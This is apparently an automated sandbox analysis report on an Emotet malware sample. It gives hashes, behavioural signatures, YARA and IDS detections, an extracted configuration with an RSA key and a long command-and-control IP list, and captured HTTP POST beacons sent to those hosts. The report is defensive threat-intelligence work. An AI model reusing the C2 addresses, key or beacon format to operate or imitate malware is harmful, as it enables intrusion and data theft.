Windows Analysis Report
ExeFile (233).exe

Overview

General Information

Sample name:ExeFile (233).exe
Analysis ID:1496042
MD5:59287b19f7d85e749d19a57337103045
SHA1:9de93499becd7a7501db4895d934d8792e7c91c8
SHA256:c19a014a1cdf25ec6441d305376dfe78b5c20ada7494fbc4aa2d6f68631df3d9
Tags:EmotetHeodo

Detection

Emotet
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Emotet
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops executables to the windows directory (C:\Windows) and starts them
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for sample
Uses known network protocols on non-standard ports
Connects to several IPs in different countries
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to delete services
Contains functionality to dynamically determine API calls
Contains functionality to enumerate running services
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files to the windows directory (C:\Windows)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential key logger detected (key state polling based)
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Communication To Uncommon Destination Ports
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • ExeFile (233).exe (PID: 3728 cmdline: "C:\Users\user\Desktop\ExeFile (233).exe" MD5: 59287B19F7D85E749D19A57337103045)
    • dfscli.exe (PID: 3180 cmdline: "C:\Windows\SysWOW64\rtmpal\dfscli.exe" MD5: 59287B19F7D85E749D19A57337103045)
      • mibincodec.exe (PID: 424 cmdline: "C:\Windows\SysWOW64\KBDTZM\mibincodec.exe" MD5: 59287B19F7D85E749D19A57337103045)
  • svchost.exe (PID: 6600 cmdline: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
Name: Emotet
Description: While Emotet historically was a banking malware organized in a botnet, nowadays Emotet is mostly seen as infrastructure as a service for content delivery. For example, since mid 2018 it is used by Trickbot for installs, which may also lead to ransomware attacks using Ryuk, a combination observed several times against high-profile targets. It is always stealing information from victims, but what the criminal gang behind it did was to open up another business channel by selling their infrastructure delivering additional malicious software. From malware analysts it has been classified into epochs depending on command and control, payloads, and delivery solutions which change over time. Emotet had been taken down by authorities in January 2021, though it appears to have sprung back to life in November 2021.
Attribution:
  • GOLD CABIN
  • MUMMY SPIDER
  • Mealybug
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.emotet
{"RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhANQOcBKvh5xEW7VcJ9totsjdBwuAclxS\nQ0e09fk8V053lktpW3TRrzAW63yt6j1KWnyxMrU3igFXypBoI4lVNmkje4UPtIIS\nfkzjEIvG1v/ZNn1k0J0PfFTxbFFeUEs3AwIDAQAB", "C2 list": ["88.153.35.32:80", "107.170.146.252:8080", "173.212.214.235:7080", "167.114.153.111:8080", "67.170.250.203:443", "121.124.124.40:7080", "103.86.49.11:8080", "74.214.230.200:80", "194.187.133.160:443", "172.104.97.173:8080", "172.91.208.86:80", "200.116.145.225:443", "202.134.4.216:8080", "172.105.13.66:443", "190.164.104.62:80", "50.35.17.13:80", "176.111.60.55:8080", "201.241.127.190:80", "66.76.12.94:8080", "95.213.236.64:8080", "194.4.58.192:7080", "62.171.142.179:8080", "79.137.83.50:443", "190.108.228.27:443", "120.150.218.241:443", "218.147.193.146:80", "176.113.52.6:443", "24.178.90.49:80", "123.176.25.234:80", "138.68.87.218:443", "194.190.67.75:80", "203.153.216.189:7080", "102.182.93.220:80", "37.139.21.175:8080", "50.91.114.38:80", "154.91.33.137:443", "97.82.79.83:80", "75.143.247.51:80", "71.15.245.148:8080", "89.121.205.18:80", "209.54.13.14:80", "47.36.140.164:80", "27.114.9.93:80", "104.131.11.150:443", "24.133.106.23:80", "49.50.209.131:80", "174.106.122.139:80", "2.58.16.89:8080", "157.245.99.39:8080", "137.59.187.107:8080", "220.245.198.194:80", "61.33.119.226:443", "62.75.141.82:80", "112.185.64.233:80", "61.19.246.238:443", "186.70.56.94:443", "37.187.72.193:8080", "190.240.194.77:443", "108.46.29.236:80", "118.83.154.64:443", "121.7.31.214:80", "216.139.123.119:80", "91.146.156.228:80", "119.59.116.21:8080", "89.216.122.92:80", "190.162.215.233:80", "87.106.136.232:8080", "68.115.186.26:80", "62.30.7.67:443", "37.179.204.33:80", "110.145.77.103:80", "78.24.219.147:8080", "185.94.252.104:443", "24.230.141.169:80", "49.3.224.99:8080", "104.131.123.136:443", "74.208.45.104:8080", "115.94.207.99:443", "41.185.28.84:8080", "139.99.158.11:443", "113.61.66.94:80", "67.163.161.107:80", "172.86.188.251:8080", "110.142.236.207:80", "120.150.60.189:80", "87.106.139.101:8080", "61.76.222.210:80", "93.147.212.206:80", "50.245.107.73:443", "85.105.111.166:80", "94.230.70.6:80", "134.209.144.106:443", "202.141.243.254:443", "94.23.237.171:443", "209.141.54.221:7080", "187.161.206.24:80", "76.175.162.101:80", "168.235.67.138:7080", "24.137.76.62:80", "95.9.5.93:80", "123.142.37.166:80", "72.186.136.247:443", "182.208.30.18:443", "186.74.215.34:80", "162.241.140.129:8080", "217.20.166.178:7080", "184.180.181.202:80", "217.123.207.149:80", "202.134.4.211:8080", "72.143.73.234:443", "59.125.219.109:443", "24.179.13.119:80", "5.39.91.110:7080", "109.74.5.95:8080", "46.105.131.79:8080", "91.211.88.52:7080", "94.200.114.161:80", "173.63.222.65:80", "139.162.60.124:8080", "188.219.31.12:80", "139.59.60.244:8080", "190.12.119.180:443", "78.188.106.53:443", "96.245.227.43:80"]}
Source: 00000003.00000002.3346727228.00000000021B4000.00000004.00001000.00020000.00000000.sdmp; Rule: JoeSecurity_Emotet; Description: Yara detected Emotet; Author: Joe Security
Source: 00000003.00000002.3346727228.00000000021B4000.00000004.00001000.00020000.00000000.sdmp; Rule: Windows_Trojan_Emotet_5528b3b0; Description: unknown; Author: unknown
  • Strings: 0x32bf:$a: 20 89 44 24 10 83 C2 02 01 74 24 10 01 7C 24 10 29 5C 24 10 66
Source: 00000002.00000002.2117416875.0000000002190000.00000040.00001000.00020000.00000000.sdmp; Rule: JoeSecurity_Emotet; Description: Yara detected Emotet; Author: Joe Security
Source: 00000002.00000002.2117416875.0000000002190000.00000040.00001000.00020000.00000000.sdmp; Rule: Windows_Trojan_Emotet_5528b3b0; Description: unknown; Author: unknown
  • Strings: 0x59ed:$a: 20 89 44 24 10 83 C2 02 01 74 24 10 01 7C 24 10 29 5C 24 10 66
Source: 00000003.00000002.3346601105.0000000002180000.00000040.00001000.00020000.00000000.sdmp; Rule: JoeSecurity_Emotet; Description: Yara detected Emotet; Author: Joe Security
(13 entries in total; only the first 5 are shown here)

Source: 2.2.dfscli.exe.219279e.2.raw.unpack; Rule: JoeSecurity_Emotet; Description: Yara detected Emotet; Author: Joe Security
Source: 2.2.dfscli.exe.219279e.2.raw.unpack; Rule: Windows_Trojan_Emotet_5528b3b0; Description: unknown; Author: unknown
  • Strings: 0x324f:$a: 20 89 44 24 10 83 C2 02 01 74 24 10 01 7C 24 10 29 5C 24 10 66
Source: 0.2.ExeFile (233).exe.21c279e.2.raw.unpack; Rule: JoeSecurity_Emotet; Description: Yara detected Emotet; Author: Joe Security
Source: 0.2.ExeFile (233).exe.21c279e.2.raw.unpack; Rule: Windows_Trojan_Emotet_5528b3b0; Description: unknown; Author: unknown
  • Strings: 0x324f:$a: 20 89 44 24 10 83 C2 02 01 74 24 10 01 7C 24 10 29 5C 24 10 66
Source: 3.2.mibincodec.exe.218279e.2.raw.unpack; Rule: JoeSecurity_Emotet; Description: Yara detected Emotet; Author: Joe Security
(25 entries in total; only the first 5 are shown here)

              System Summary

Source: Network Connection; Author: Florian Roth (Nextron Systems); Data: DestinationIp: 107.170.146.252, DestinationIsIpv6: false, DestinationPort: 8080, EventID: 3, Image: C:\Windows\SysWOW64\KBDTZM\mibincodec.exe, Initiated: true, ProcessId: 424, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49735
Source: Process started; Author: vburov; Data: Command: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager, CommandLine: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager, ProcessId: 6600, ProcessName: svchost.exe
Timestamp: 2024-08-20T19:11:56.438207+0200; SID: 2035077; Severity: 1; Source Port: 49747; Destination Port: 80; Protocol: TCP; Classtype: A Network Trojan was detected
Timestamp: 2024-08-20T19:09:53.067014+0200; SID: 2035077; Severity: 1; Source Port: 49749; Destination Port: 443; Protocol: TCP; Classtype: A Network Trojan was detected
Timestamp: 2024-08-20T19:11:31.533291+0200; SID: 2035077; Severity: 1; Source Port: 49745; Destination Port: 8080; Protocol: TCP; Classtype: A Network Trojan was detected
Timestamp: 2024-08-20T19:10:28.346788+0200; SID: 2035077; Severity: 1; Source Port: 49730; Destination Port: 80; Protocol: TCP; Classtype: A Network Trojan was detected
Timestamp: 2024-08-20T19:10:55.327152+0200; SID: 2035077; Severity: 1; Source Port: 49739; Destination Port: 7080; Protocol: TCP; Classtype: A Network Trojan was detected
Timestamp: 2024-08-20T19:11:07.013000+0200; SID: 2035077; Severity: 1; Source Port: 49742; Destination Port: 7080; Protocol: TCP; Classtype: A Network Trojan was detected
Timestamp: 2024-08-20T19:10:52.310016+0200; SID: 2035077; Severity: 1; Source Port: 49735; Destination Port: 8080; Protocol: TCP; Classtype: A Network Trojan was detected
Timestamp: 2024-08-20T19:11:00.118321+0200; SID: 2035077; Severity: 1; Source Port: 49740; Destination Port: 8080; Protocol: TCP; Classtype: A Network Trojan was detected

              AV Detection

Source: ExeFile (233).exe; Avira: detected
Source: https://67.170.250.203:443/vE1qWiF8GUO/OKiMtdK9y/9BlkbfHs/KSvjvc1is4hq83x0Q/qTFsKaNJ2QVx5a/KqpZ4e/; Avira URL Cloud: Label: malware
Source: http://67.170.250.203:443/vE1qWiF8GUO/OKiMtdK9y/9BlkbfHs/KSvjvc1is4hq83x0Q/qTFsKaNJ2QVx5a/KqpZ4e/; Avira URL Cloud: Label: malware
Source: 0.2.ExeFile (233).exe.2260000.3.unpack; Malware Configuration Extractor: Emotet {"RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhANQOcBKvh5xEW7VcJ9totsjdBwuAclxS\nQ0e09fk8V053lktpW3TRrzAW63yt6j1KWnyxMrU3igFXypBoI4lVNmkje4UPtIIS\nfkzjEIvG1v/ZNn1k0J0PfFTxbFFeUEs3AwIDAQAB", "C2 list": ["88.153.35.32:80", "107.170.146.252:8080", "173.212.214.235:7080", "167.114.153.111:8080", "67.170.250.203:443", "121.124.124.40:7080", "103.86.49.11:8080", "74.214.230.200:80", "194.187.133.160:443", "172.104.97.173:8080", "172.91.208.86:80", "200.116.145.225:443", "202.134.4.216:8080", "172.105.13.66:443", "190.164.104.62:80", "50.35.17.13:80", "176.111.60.55:8080", "201.241.127.190:80", "66.76.12.94:8080", "95.213.236.64:8080", "194.4.58.192:7080", "62.171.142.179:8080", "79.137.83.50:443", "190.108.228.27:443", "120.150.218.241:443", "218.147.193.146:80", "176.113.52.6:443", "24.178.90.49:80", "123.176.25.234:80", "138.68.87.218:443", "194.190.67.75:80", "203.153.216.189:7080", "102.182.93.220:80", "37.139.21.175:8080", "50.91.114.38:80", "154.91.33.137:443", "97.82.79.83:80", "75.143.247.51:80", "71.15.245.148:8080", "89.121.205.18:80", "209.54.13.14:80", "47.36.140.164:80", "27.114.9.93:80", "104.131.11.150:443", "24.133.106.23:80", "49.50.209.131:80", "174.106.122.139:80", "2.58.16.89:8080", "157.245.99.39:8080", "137.59.187.107:8080", "220.245.198.194:80", "61.33.119.226:443", "62.75.141.82:80", "112.185.64.233:80", "61.19.246.238:443", "186.70.56.94:443", "37.187.72.193:8080", "190.240.194.77:443", "108.46.29.236:80", "118.83.154.64:443", "121.7.31.214:80", "216.139.123.119:80", "91.146.156.228:80", "119.59.116.21:8080", "89.216.122.92:80", "190.162.215.233:80", "87.106.136.232:8080", "68.115.186.26:80", "62.30.7.67:443", "37.179.204.33:80", "110.145.77.103:80", "78.24.219.147:8080", "185.94.252.104:443", "24.230.141.169:80", "49.3.224.99:8080", "104.131.123.136:443", "74.208.45.104:8080", "115.94.207.99:443", "41.185.28.84:8080", "139.99.158.11:443", "113.61.66.94:80", "67.163.161.107:80", "172.86.188.251:8080", "110.142.236.207:80", "120.150.60.189:80", "87.106.139.101:8080", "61.76.222.210:80", "93.147.212.206:80", "50.245.107.73:443", "85.105.111.166:80", "94.230.70.6:80", "134.209.144.106:443", "202.141.243.254:443", "94.23.237.171:443", "209.141.54.221:7080", "187.161.206.24:80", "76.175.162.101:80", "168.235.67.138:7080", "24.137.76.62:80", "95.9.5.93:80", "123.142.37.166:80", "72.186.136.247:443", "182.208.30.18:443", "186.74.215.34:80", "162.241.140.129:8080", "217.20.166.178:7080", "184.180.181.202:80", "217.123.207.149:80", "202.134.4.211:8080", "72.143.73.234:443", "59.125.219.109:443", "24.179.13.119:80", "5.39.91.110:7080", "109.74.5.95:8080", "46.105.131.79:8080", "91.211.88.52:7080", "94.200.114.161:80", "173.63.222.65:80", "139.162.60.124:8080", "188.219.31.12:80", "139.59.60.244:8080", "190.12.119.180:443", "78.188.106.53:443", "96.245.227.43:80"]}
Source: ExeFile (233).exe; ReversingLabs: Detection: 81%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 97.3% probability
Source: ExeFile (233).exe; Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\ExeFile (233).exe; Code function: 0_2_00402530 LoadLibraryA,LoadLibraryA,GetProcAddress,EncryptFileA,LoadLibraryA,GetProcAddress,GetProcAddress,LdrFindResource_U,LdrAccessResource,VirtualAlloc,0_2_00402530
Source: C:\Windows\SysWOW64\rtmpal\dfscli.exe; Code function: 2_2_00402530 LoadLibraryA,LoadLibraryA,GetProcAddress,EncryptFileA,LoadLibraryA,GetProcAddress,GetProcAddress,LdrFindResource_U,LdrAccessResource,VirtualAlloc,2_2_00402530
Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exe; Code function: 3_2_021F2650 CryptAcquireContextW,CryptGenKey,CryptCreateHash,CryptImportKey,LocalFree,CryptDecodeObjectEx,CryptDecodeObjectEx,3_2_021F2650
Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exe; Code function: 3_2_021F2290 CryptGetHashParam,CryptEncrypt,CryptDestroyHash,CryptDuplicateHash,memcpy,CryptExportKey,GetProcessHeap,RtlAllocateHeap,3_2_021F2290
Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exe; Code function: 3_2_021F1FB0 memcpy,GetProcessHeap,RtlAllocateHeap,CryptDestroyHash,CryptDuplicateHash,3_2_021F1FB0
Source: ExeFile (233).exe; Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Users\user\Desktop\ExeFile (233).exe; Code function: 0_2_00424A99 __EH_prolog,GetFullPathNameA,lstrcpynA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,lstrcpyA,0_2_00424A99
Source: C:\Users\user\Desktop\ExeFile (233).exe; Code function: 0_2_022638F0 FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,FindFirstFileW,_snwprintf,FindClose,0_2_022638F0
Source: C:\Windows\SysWOW64\rtmpal\dfscli.exe; Code function: 2_2_00424A99 __EH_prolog,GetFullPathNameA,lstrcpynA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,lstrcpyA,2_2_00424A99
Source: C:\Windows\SysWOW64\rtmpal\dfscli.exe; Code function: 2_2_022338F0 FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,FindFirstFileW,_snwprintf,FindClose,2_2_022338F0
Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exe; Code function: 3_2_021F38F0 FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindFirstFileW,FindFirstFileW,_snwprintf,FindClose,FindClose,3_2_021F38F0

              Networking

Source: Network traffic; Suricata IDS: 2035077 - Severity 1 - ET MALWARE Win32/Emotet CnC Activity (POST) M11 : 192.168.2.6:49730 -> 88.153.35.32:80
Source: Network traffic; Suricata IDS: 2035077 - Severity 1 - ET MALWARE Win32/Emotet CnC Activity (POST) M11 : 192.168.2.6:49742 -> 121.124.124.40:7080
Source: Network traffic; Suricata IDS: 2035077 - Severity 1 - ET MALWARE Win32/Emotet CnC Activity (POST) M11 : 192.168.2.6:49735 -> 107.170.146.252:8080
Source: Network traffic; Suricata IDS: 2035077 - Severity 1 - ET MALWARE Win32/Emotet CnC Activity (POST) M11 : 192.168.2.6:49739 -> 173.212.214.235:7080
Source: Network traffic; Suricata IDS: 2035077 - Severity 1 - ET MALWARE Win32/Emotet CnC Activity (POST) M11 : 192.168.2.6:49745 -> 103.86.49.11:8080
Source: Network traffic; Suricata IDS: 2035077 - Severity 1 - ET MALWARE Win32/Emotet CnC Activity (POST) M11 : 192.168.2.6:49747 -> 74.214.230.200:80
Source: Network traffic; Suricata IDS: 2035077 - Severity 1 - ET MALWARE Win32/Emotet CnC Activity (POST) M11 : 192.168.2.6:49740 -> 167.114.153.111:8080
Source: Network traffic; Suricata IDS: 2035077 - Severity 1 - ET MALWARE Win32/Emotet CnC Activity (POST) M11 : 192.168.2.6:49749 -> 194.187.133.160:443
Source: Malware configuration extractor; IPs: 88.153.35.32:80, 107.170.146.252:8080, 173.212.214.235:7080, 167.114.153.111:8080, 67.170.250.203:443, 121.124.124.40:7080, 103.86.49.11:8080, 74.214.230.200:80, 194.187.133.160:443, 172.104.97.173:8080, 172.91.208.86:80, 200.116.145.225:443, 202.134.4.216:8080, 172.105.13.66:443, 190.164.104.62:80, 50.35.17.13:80, 176.111.60.55:8080, 201.241.127.190:80, 66.76.12.94:8080, 95.213.236.64:8080, 194.4.58.192:7080, 62.171.142.179:8080, 79.137.83.50:443, 190.108.228.27:443, 120.150.218.241:443, 218.147.193.146:80, 176.113.52.6:443, 24.178.90.49:80, 123.176.25.234:80, 138.68.87.218:443, 194.190.67.75:80, 203.153.216.189:7080, 102.182.93.220:80, 37.139.21.175:8080, 50.91.114.38:80, 154.91.33.137:443, 97.82.79.83:80, 75.143.247.51:80, 71.15.245.148:8080, 89.121.205.18:80, 209.54.13.14:80, 47.36.140.164:80, 27.114.9.93:80, 104.131.11.150:443, 24.133.106.23:80, 49.50.209.131:80, 174.106.122.139:80, 2.58.16.89:8080, 157.245.99.39:8080, 137.59.187.107:8080, 220.245.198.194:80, 61.33.119.226:443, 62.75.141.82:80, 112.185.64.233:80, 61.19.246.238:443, 186.70.56.94:443, 37.187.72.193:8080, 190.240.194.77:443, 108.46.29.236:80, 118.83.154.64:443, 121.7.31.214:80, 216.139.123.119:80, 91.146.156.228:80, 119.59.116.21:8080, 89.216.122.92:80, 190.162.215.233:80, 87.106.136.232:8080, 68.115.186.26:80, 62.30.7.67:443, 37.179.204.33:80, 110.145.77.103:80, 78.24.219.147:8080, 185.94.252.104:443, 24.230.141.169:80, 49.3.224.99:8080, 104.131.123.136:443, 74.208.45.104:8080, 115.94.207.99:443, 41.185.28.84:8080, 139.99.158.11:443, 113.61.66.94:80, 67.163.161.107:80, 172.86.188.251:8080, 110.142.236.207:80, 120.150.60.189:80, 87.106.139.101:8080, 61.76.222.210:80, 93.147.212.206:80, 50.245.107.73:443, 85.105.111.166:80, 94.230.70.6:80, 134.209.144.106:443, 202.141.243.254:443, 94.23.237.171:443, 209.141.54.221:7080, 187.161.206.24:80, 76.175.162.101:80, 168.235.67.138:7080, 24.137.76.62:80, 95.9.5.93:80, 123.142.37.166:80, 72.186.136.247:443, 182.208.30.18:443, 186.74.215.34:80, 162.241.140.129:8080, 217.20.166.178:7080, 184.180.181.202:80, 217.123.207.149:80, 202.134.4.211:8080, 72.143.73.234:443, 59.125.219.109:443, 24.179.13.119:80, 5.39.91.110:7080, 109.74.5.95:8080, 46.105.131.79:8080, 91.211.88.52:7080, 94.200.114.161:80, 173.63.222.65:80, 139.162.60.124:8080, 188.219.31.12:80, 139.59.60.244:8080, 190.12.119.180:443, 78.188.106.53:443, 96.245.227.43:80
Source: unknown; Network traffic detected: HTTP traffic on port 49739 -> 7080
Source: unknown; Network traffic detected: HTTP traffic on port 7080 -> 49739
Source: unknown; Network traffic detected: HTTP traffic on port 49742 -> 7080
Source: unknown; Network traffic detected: IP country count 35
Source: global traffic; TCP traffic: 192.168.2.6:49735 -> 107.170.146.252:8080
Source: global traffic; TCP traffic: 192.168.2.6:49739 -> 173.212.214.235:7080
Source: global traffic; TCP traffic: 192.168.2.6:49740 -> 167.114.153.111:8080
Source: global traffic; TCP traffic: 192.168.2.6:49742 -> 121.124.124.40:7080
Source: global traffic; TCP traffic: 192.168.2.6:49745 -> 103.86.49.11:8080
Source: Joe Sandbox View; IP Address: 194.4.58.192
Source: Joe Sandbox View; IP Address: 102.182.93.220
Source: Joe Sandbox View; IP Address: 95.9.5.93
Source: Joe Sandbox View; IP Address: 94.200.114.161
Source: Joe Sandbox View; IP Address: 72.186.136.247
Source: Joe Sandbox View; ASN Name: HOSTER-KZ
Source: Joe Sandbox View; ASN Name: AfrihostZA
Source: Joe Sandbox View; ASN Name: TTNETTR
Source: global traffic; HTTP traffic detected:
  POST /LqhsCyik6x/yDMw9sEc7al9N/WQVwtBBo/ HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
  Accept-Encoding: gzip, deflate
  DNT: 1
  Connection: keep-alive
  Referer: 88.153.35.32/
  Upgrade-Insecure-Requests: 1
  Content-Type: multipart/form-data; boundary=--------------oxhn8YFF02lqHF
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: 88.153.35.32
  Content-Length: 4628
  Cache-Control: no-cache
Source: global traffic; HTTP traffic detected:
  POST /59QulnlrGjN3xHL/Y0uv73jS/ HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
  Accept-Encoding: gzip, deflate
  DNT: 1
  Connection: keep-alive
  Referer: 107.170.146.252/
  Upgrade-Insecure-Requests: 1
  Content-Type: multipart/form-data; boundary=-------------------GLzKnj3AY6lNu0XkAPz
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: 107.170.146.252:8080
  Content-Length: 4628
  Cache-Control: no-cache
Source: global traffic; HTTP traffic detected:
  POST /R30ZS/Ks4Vh/d73Tc74w4GJR/CzehVO/ HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
  Accept-Encoding: gzip, deflate
  DNT: 1
  Connection: keep-alive
  Referer: 173.212.214.235/
  Upgrade-Insecure-Requests: 1
  Content-Type: multipart/form-data; boundary=---------8eRw1EpsQ
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: 173.212.214.235:7080
  Content-Length: 4628
  Cache-Control: no-cache
Source: global traffic; HTTP traffic detected:
  POST /IIFe/1yJDM9EkbiP8R7/XHAjzKH0LnedA/ HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
  Accept-Encoding: gzip, deflate
  DNT: 1
  Connection: keep-alive
  Referer: 167.114.153.111/
  Upgrade-Insecure-Requests: 1
  Content-Type: multipart/form-data; boundary=--------kYHRLcw3
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: 167.114.153.111:8080
  Content-Length: 4628
  Cache-Control: no-cache
Source: global traffic; HTTP traffic detected:
  POST /vE1qWiF8GUO/OKiMtdK9y/9BlkbfHs/KSvjvc1is4hq83x0Q/qTFsKaNJ2QVx5a/KqpZ4e/ HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
  Accept-Encoding: gzip, deflate
  DNT: 1
  Connection: keep-alive
  Referer: 67.170.250.203/
  Upgrade-Insecure-Requests: 1
  Content-Type: multipart/form-data; boundary=---------------Eoyapxu02W4DrmN
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: 67.170.250.203:443
  Content-Length: 4628
  Cache-Control: no-cache
Source: global traffic; HTTP traffic detected:
  POST /gLDpms1fYdKy/ HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
  Accept-Encoding: gzip, deflate
  DNT: 1
  Connection: keep-alive
  Referer: 121.124.124.40/
  Upgrade-Insecure-Requests: 1
  Content-Type: multipart/form-data; boundary=----------------xQkdZnrmTvVZqhGU
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: 121.124.124.40:7080
  Content-Length: 4628
  Cache-Control: no-cache
Source: global traffic; HTTP traffic detected:
  POST /9mmFlI8wqZPEO4Eye/1GdTSUCcmXtydSz7Jl/ HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
  Accept-Encoding: gzip, deflate
  DNT: 1
  Connection: keep-alive
  Referer: 103.86.49.11/
  Upgrade-Insecure-Requests: 1
  Content-Type: multipart/form-data; boundary=---------------------55np6X3FuJzN6N0jwc7TN
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: 103.86.49.11:8080
  Content-Length: 4612
  Cache-Control: no-cache
Source: global traffic; HTTP traffic detected:
  POST /LpKB18VG3Sv/wCjo7wyWELImd4sKB/XYJP/vAurLMRY4/JiSXcWi0E/bmhDcdvNb3/ HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
  Accept-Encoding: gzip, deflate
  DNT: 1
  Connection: keep-alive
  Referer: 74.214.230.200/
  Upgrade-Insecure-Requests: 1
  Content-Type: multipart/form-data; boundary=---------------08lfRHAZEMwmT24
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: 74.214.230.200
  Content-Length: 4612
  Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /67tfsWS9hNw/KKtRVVGv4EtXppzG6kI/QUenxzCNc1M41S/3mazKpx2CkV0/iq7lqvPWFwbXzrG/URwQPsLPEtkyUnGKT/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 194.187.133.160/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=---------------ZhnuNfjLptUX6mpUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 194.187.133.160:443Content-Length: 4596Cache-Control: no-cache
              Source: unknownTCP traffic detected without corresponding DNS query: 88.153.35.32
              Source: unknownTCP traffic detected without corresponding DNS query: 107.170.146.252
              Source: unknownTCP traffic detected without corresponding DNS query: 173.212.214.235
              Source: unknownTCP traffic detected without corresponding DNS query: 167.114.153.111
              Source: unknownTCP traffic detected without corresponding DNS query: 67.170.250.203
              Source: unknownTCP traffic detected without corresponding DNS query: 121.124.124.40
